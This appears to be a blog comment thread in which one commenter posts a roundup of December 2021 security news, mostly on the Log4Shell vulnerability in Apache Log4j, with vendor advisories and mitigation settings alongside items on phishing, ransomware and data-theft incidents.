Julkisten tietojen perusteella haavoittuvuus on koskenut myös isoa osaa internetin palveluita. Tarkennamme Tietoturva Nyt!-julkaisua kun lisätietoja haavoittuvista sovelluksista julkaistaan. On erittäin suositeltavaa päivittää Apache Log4j mahdollisimman pian versioon log4j-2.15.0-rc2. Tavallinen käyttäjä ei voi tehdä toimenpiteitä haavoittuvuuden korjaamiseksi, vaan niitä odotetaan ylläpitäjiltä.
Tomi Engdahl says:
TECHNICAL: RCE in log4j, Log4Shell, or how things can get bad quickly
https://isc.sans.edu/diary/rss/28120
If you have been following developments on Twitter and various other security sources, by now you have undoubtedly heard about the latest vulnerability in the very popular Apache log4j library. log4j is a very popular logging package for Java. It is very powerful and flexible and, even from my own experience, is used in almost every Java application that I have ever encountered. No wonder, it allows you to just create an instance of the log4j class and then easily use it for logging, based on provided configuration parameters (typically set in the log4j.properties file). Yesterday a PoC for a Remote Code Execution vulnerability in log4j was published. The exploit is actually unbelievably simple which makes it very, very scary at the same time.The vulnerability is in the JNDI lookup feature of the log4j library. While the background around this is very complex, exploitation actually is not (as you will see below in couple redacted screenshots). The vulnerability is in the JNDI lookup feature of the log4j library. While the background around this is very complex, exploitation actually is not (as you will see below in couple redacted screenshots). More information:
https://nakedsecurity.sophos.com/2021/12/10/log4shell-java-vulnerability-how-to-safeguard-your-servers/
Tomi Engdahl says:
OVERVIEW: The Internet Is on Fire
https://www.wired.com/story/log4j-flaw-hacking-internet/
A vulnerability in the Log4j logging framework has security teams scrambling to put in a fix. A vulnerability in a widely used logging library has become a full-blown security meltdown, affecting digital systems across the internet. Hackers are already attempting to exploit it, but even as fixes emerge, researchers warn that the flaw could have serious repercussions worldwide. The problem lies in Log4j, a ubiquitous, open source Apache logging framework that developers use to keep a record of activity within an application. Security responders are scrambling to patch the bug, which can be easily exploited to take control of vulnerable systems remotely. At the same time, hackers are actively scanning the internet for affected systems.
Some have already developed tools that automatically attempt to exploit the bug, as well as worms that can spread independently from one vulnerable system to another under the right conditions.
AFFECTED SERVICES: The Internet’s biggest players are all affected by critical Log4Shell 0-day https://arstechnica.com/information-technology/2021/12/the-critical-log4shell-zero-day-affects-a-whos-who-of-big-cloud-services/
The list of services with Internet-facing infrastructure that is vulnerable to a critical zero-day vulnerability in the open source Log4j logging utility is immense and reads like a who’s who of the biggest names on the Internet, including Apple, Amazon, Cloudflare, Steam, Tesla, Twitter, and Baidu. The vulnerability, now going by the name Log4Shell, came to light on Thursday afternoon, when several Minecraft services and news sites warned of actively circulating attack code that exploited the vulnerability to execute malicious code on servers and clients running the world’s bestselling game. Soon, it became clear that Minecraft was only one of likely thousands of big-name services that can be felled by similar attacks.
Tomi Engdahl says:
Russian hackers bypass 2FA by annoying victims with repeated push notifications https://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notifications/
Nobelium, the Russian cyber-espionage group that has orchestrated the SolarWinds 2020 supply chain attack, has continued to carry out new attacks throughout 2021, and according to security firm Mandiant, has been using a clever trick to bypass two-factor authentication in order to access some of its targets’ accounts. The technique, detailed in a report published on Monday, involves abusing the push notification feature of some online accounts. 2FA (two-factor authentication) or MFA (multi-factor authentication) push notifications are typically used as an alternative to receiving one-time codes via SMS or email, and they take the form of a popup that appears on a smartphone. When a user logs into an account with valid credentials, a push notification is shown on their smartphone, with details about the type and IP address of the device trying to access the account and asking for permission to allow the operation to go through. On Monday, Mandiant researchers said they’d investigated several incidents where Nobelium members gained access to a user’s valid login credentials, and they repeatedly attempted to log into the account, triggering repeated 2FA push notifications on the victim’s device until the target eventually accepted the request.
Tomi Engdahl says:
Massive attack against 1.6 million WordPress sites underway https://www.bleepingcomputer.com/news/security/massive-attack-against-16-million-wordpress-sites-underway/
Wordfence analysts report having detected a massive wave of attacks in the last couple of days, originating from 16, 000 IPs and targeting over 1.6 million WordPress sites. The threat actors target four WordPress plugins and fifteen Epsilon Framework themes, one of which has no available patch. Some of the targeted plugins were patched all the way back in 2018, while others had their vulnerabilities addressed as recently as this week.
Tomi Engdahl says:
Viranomaiselta varoitus somessa leviävästä huijauksesta tällaiset viestit ovat merkki siitä, että tiliäsi yritetään kaapata https://www.is.fi/digitoday/tietoturva/art-2000008467009.html
Liikenne- ja viestintävirasto Traficomin Kyberturvallisuuskeskus varoittaa, että suomalaisten tilejä nettipalveluihin yritetään kaapata. Aiemmin nähty hyökkäyskampanja jatkuu. Hyökkäyksen kohteelle tämä näkyy yleensä siten, että kaveri lähestyy sosiaalisessa mediassa yleensä Facebook Messengerissä tai Instagramissa ja pyytää puhelinnumeroa. Usein syyksi kerrotaan kaverin ilmoittaminen kilpailuun. Tätä kyselyä seuraa tekstiviesti, jonka väitetään olevan osallistumiskoodi kilpailuun. Siinä oleva koodi pyydetään luovuttamaan eteenpäin. Tämän viestin saapuminen on merkki siitä, että joku yrittää päästä tilillesi käsiksi.
Tomi Engdahl says:
Log4j2 Vulnerability “Log4Shell” (CVE-2021-44228) https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers.According to public sources, Chen Zhaojun of Alibaba officially reported a Log4j2 remote code execution
(RCE) vulnerability to Apache on Nov. 24, 2021. This critical vulnerability, subsequently tracked as CVE-2021-44228 (aka “Log4Shell”), impacts all versions of Log4j2 from 2.0-beta9 to 2.14.1.
Attempts to mitigate CVE-2021-44228 resulted in at least two fixes in release candidates of Log4j2 since November 2021. The first of these, on Nov. 29, 2021, included a partial fix by disabling message lookups for logging mechanism API functions. The second, released on Dec. 5, 2021, restricted the accesses and protocols that Log4j2 permits via Lightweight Directory Access Protocol (LDAP) and the Java Naming and Directory Interface (JNDI). However, industry sources suggest these fixes were incomplete, as the initial release candidate (Log4j2
2.15.0-rc1) addressing CVE-2021-44228 could be bypassed to achieve RCE. As of Dec. 10, 2021, version Log4j2 2.15.0-rc2 is recommended for use; however, guidance around this could change as more information is uncovere
Tomi Engdahl says:
Researchers release ‘vaccine’ for critical Log4Shell vulnerability https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/
Researchers from cybersecurity firm Cybereason has released a “vaccine” that can be used to remotely mitigate the critical ‘Log4Shell’ Apache Log4j code execution vulnerability running rampant through the Internet. Apache Log4j is a Java-based logging platform that can be used to analyze web server access logs or application logs. The software is heavily used in the enterprise, eCommerce platforms, and games, such as Minecraft who rushed out a patched version earlier today. Early this morning, researchers released a proof-of-concept exploit for a zero-day remote code execution vulnerability in Apache Log4j tracked as CVE-2021-44228 and dubbed ‘Log4Shell.’. While Apache quickly released Log4j 2.15.0 to resolve the vulnerability, the vulnerability is trivial to exploit, and cybersecurity firms and researchers quickly saw attackers scan and attempt to compromise vulnerable devices. As threat actors can exploit this vulnerability by simply changing their web browser’s user agent and visiting a vulnerable site or searching for that string on a site, it quickly became a nightmare for the enterprise and some of the most popular websites on the web.
Log4j / Log4Shell Followup: What we see and how to defend (and how to access our data)
https://isc.sans.edu/diary/rss/28122
See the command-line options for mitigation.
Tomi Engdahl says:
If not possible, according to Apache advisory, other remediation steps are possible:
https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/
For Log4j 2.10 or higher: add -Dlog4j.formatMsgNoLookups=true as a command line option or add log4j.formatMsgNoLookups=true to the log4j2.component.properties file on the classpath to prevent lookups in log event messages. For Log4j 2.7 or higher: specify %m{nolookups} in the PatternLayout configuration to prevent lookups in log event messages. Remove the JndiLookup and JndiManager classes from the log4j-core jar. Note that removal of the JndiManager causes the JndiContextSelector and JMSAppender not to function.
Tomi Engdahl says:
Irish Health Service ransomware attack happened after one staffer opened malware-ridden email https://www.theregister.com/2021/12/10/ireland_health_conti_ransomware_attack_report/
Ireland’s Health Service Executive (HSE) was almost paralysed by ransomware after a single user opened a malicious file attached to a phishing email, a consultancy’s damning report has revealed. Issued today, the report from PWC (formerly known as PriceWaterhouseCoopers) said that the hugely harmful Conti ransomware infection was caused because of the simplest attack vector known to infosec: spam. PWC said, in the report’s executive summary: “The Malware infection was the result of the user of the Patient Zero Workstation clicking and opening a malicious Microsoft Excel file that was attached to a phishing email sent to the user on 16 March 2021.”
Tomi Engdahl says:
Volvo finally confirms “pontential” theft of R&D data https://therecord.media/volvo-finally-confirms-pontential-theft-of-rd-data/
Swedish automaker Volvo confirmed today a security breach and the theft of research and development (R&D) data from one of its file storage repositories. The company’s admission comes after it initially played down the incident describing it in emails to The Record as a “potential cyberattack” and refused to comment despite its data having been leaked online since November 30. But in a statement today, Volvo said the incident was more than potential and might be worse than it initially appeared. While the company did not elaborate on the details, Volva said “there may be an impact on the company’s operation.”. The company’s disclosure today is related to an entry on the dark web portal managed by Snatch, a hacking group known to steal data and engage in extortion attempts.
Tomi Engdahl says:
Phishing attacks use QR codes to steal banking credentials https://www.bleepingcomputer.com/news/security/phishing-attacks-use-qr-codes-to-steal-banking-credentials/
A new phishing campaign that targets German e-banking users has been underway in the last couple of weeks, involving QR codes in the credential-snatching process. The actors are using a range of tricks to bypass security solutions and convince their targets to open the messages and follow the instructions. The relevant report comes from researchers at Cofense, who sampled several of these messages and mapped the actors’ tactics in detail.
Tomi Engdahl says:
Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”. The vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component. For more technical and mitigation information about the vulnerability, please read the Microsoft Security Response Center blog. The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers.
Tomi Engdahl says:
Log4Shell: Reconnaissance and post exploitation network detection https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/
Note: This blogpost will be live-updated with new information. NCC Group’s RIFT is intending to publish PCAPs of different exploitation methods in the near future last updated December 12th at 19:15 UTC.
In the wake of the CVE-2021-44228 (a.k.a. Log4Shell) vulnerability publication, NCC Group’s RIFT immediately started investigating the vulnerability in order to improve detection and response capabilities mitigating the threat. This blog post is focussed on detection and threat hunting, aalthough attacNCk surface scanning and identification are also quintessential parts of a holistic response. Multiple references for prevention and mitigation can be found included at the end of this post. This blogpost provides Suricata network detection rules that can be used not only to detect exploitation attempts, but also indications of successful exploitation. In addition, a list of indicators of compromise (IOC’s) are provided. These IOC’s have been observed listening for incoming connections and are thus a useful for threat hunting.
Inside the Log4j2 vulnerability (CVE-2021-44228) https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
Yesterday, December 9, 2021, a very serious vulnerability in the popular Java-based logging package Log4j was disclosed. This vulnerability allows an attacker to execute code on a remote server; a so-called Remote Code Execution (RCE). Because of the widespread use of Java and Log4j this is likely one of the most serious vulnerabilities on the Internet since both Heartbleed and ShellShock.
It is CVE-2021-44228 and affects version 2 of Log4j between versions
2.0-beta-9 and 2.14.1. It is patched in 2.15.0.
Tomi Engdahl says:
Critical vulnerability in Apache Log4j library
https://www.kaspersky.com/blog/log4shell-critical-vulnerability-in-apache-log4j/43124/
Researchers discovered a critical vulnerability in Apache Log4j library, which scores perfect 10 out of 10 in CVSS. Here’s how to protect.
Various information security news outlets reported on the discovery of critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity level 10 out of 10). Millions of Java applications use this library to log error messages. To make matters worse, attackers are already actively exploiting this vulnerability. For this reason, the Apache Foundation recommends all developers to update the library to version 2.15.0, and if this is not possible, use one of the methods described on the Apache Log4j Security Vulnerabilities page.
Apache Log4j Security Vulnerabilities
https://logging.apache.org/log4j/2.x/security.html
Tomi Engdahl says:
Log4J “Log4Shell” Zero-Day Vulnerability: Impact and Fixes
https://fossa.com/blog/log4j-log4shell-zero-day-vulnerability-impact-fixes/
A critical vulnerability has been discovered in Apache Log4J, the popular java open source logging library used in countless applications across the world. This vulnerability is being tracked as CVE-2021-44228 has been assigned a CVSS score of 10, the maximum severity rating possible.
Log4J versions 2.15.0 and prior are subject to a remote code execution vulnerability.
As per Apache security releases, Apache Log4J2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From Log4J 2.15.0, this behavior has been disabled by default.
Impact of the Log4J Vulnerability
Logging untrusted or user-controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data provided in logged errors such as exception traces, authentication failures, and other unexpected vectors of user-controlled input
Any Log4J version prior to v2.15.0 is affected by this specific issue.
The version 1 branch of Log4J is vulnerable to other RCE attacks and should be updated.
You can check for affected versions of Log4J by scanning your projects in FOSSA or manually checking for Log4J in projects pom.xml.
If possible, upgrade to Log4J version 2.15.0. If you are using Log4J v1, there is a migration guide available.
If upgrading is not possible, then ensure the -Dlog4j2.formatMsgNoLookups=true system property is set on both client- and server-side components.
https://logging.apache.org/log4j/2.x/manual/migration.html
Tomi Engdahl says:
DHS warns of critical flaw in widely used software
https://lm.facebook.com/l.php?u=https%3A%2F%2Fwww.cnn.com%2F2021%2F12%2F11%2Fpolitics%2Fdhs-log4j-software-flaw-warning%2Findex.html&h=AT3qiy9BjGddVicOwgmnuAyBphlLUoU7GEwuuNU-6uizZjiI1E2n0fjagTwsy0c3ZuGz9KVDuQF2JD4ReLX9Z06b1-Ibz5tpC4OQIiQjDPndp_8NYhRCVkOZm8814WqAzQ
(CNN) – The Department of Homeland Security’s top cyber official on Saturday urged government and private-sector organizations to address a critical flaw in widely used software that hackers were actively using to try to breach networks.
The vulnerability is in Java-based software known as “Log4j” that large organizations, including some of the world’s biggest tech firms, use to configure their applications.
Apple’s cloud computing service, security firm Cloudflare and one of the world’s most popular video games, Minecraft, are among the organizations that run Log4j, according to security researchers.
The vulnerability can offer a hacker a relatively easy way to access an organization’s computer server. From there, an attacker could devise other ways to access systems on an organization’s network.
The situation escalated before the weekend when a tool for exploiting the vulnerability was made public on GitHub, a software repository. That gave malicious hackers a potential roadmap for how to use the vulnerability to break into devices.
Cybersecurity researchers interviewed by CNN said it was unclear just how many devices on the internet are exposed to the vulnerability. But IT administrators around the world are on notice and preparing for a long weekend of responding to hacks.
Kevin Beaumont, a researcher who keeps a close eye on emerging software flaws, compared the conundrum that organizations are in with the software flaw to “lock[ing] the doors to your car, but then allow[ing] anybody to shout commands at Siri from outside the car to remotely drive it.”
“Log4j is buried deep inside products and [organizations], gonna be painful to fix,” Beaumont tweeted Friday.
Tomi Engdahl says:
Apache Log4j 2 vulnerability CVE-2021-44228
https://www.jenkins.io/blog/2021/12/10/log4j2-rce-CVE-2021-44228/
The Jenkins security team has confirmed that Log4j is not used in Jenkins core. Jenkins plugins may be using Log4j. You can identify
Tomi Engdahl says:
WD Updates SanDisk SecureAccess to Prevent Dictionary, Brute Force Attacks
https://www.securityweek.com/wd-updates-sandisk-secureaccess-prevent-dictionary-brute-force-attacks
Tomi Engdahl says:
Exploits Swirling for Major Security Defect in Apache Log4j
https://www.securityweek.com/exploits-swirling-major-security-defect-apache-log4j
Enterprise security response teams are bracing for a hectic weekend as public exploits — and in-the-wild attacks — circulate for a gaping code execution hole in the widely used Apache Log4j utility.
The remote code execution flaw is already being exploited to compromise Minecraft servers but, with such a massive attack surface at organizations around the world, experts warn that widespread exploitation is inevitable.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild and prompted the release of a high-priority patch.
The open-source Apache Foundation released an advisory to warn of the critical nature of the issue and notes that all versions from Log4j 2.0-beta9 to 2.14.1 are affected.
The raw details from the Apache advisory:
Descripton: Apache Log4j2 =2.10) this behavior can be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 protects against RCE by defaulting “com.sun.jndi.rmi.object.trustURLCodebase” and “com.sun.jndi.cosnaming.object.trustURLCodebase” to “false”.
Because the Log4j Java logging framework is deployed at internet infrastructure at thousands of major organizations (here’s a tracker of the expanding attack surface), there is growing urgency to stand up an emergency response organization to mitigate the issue.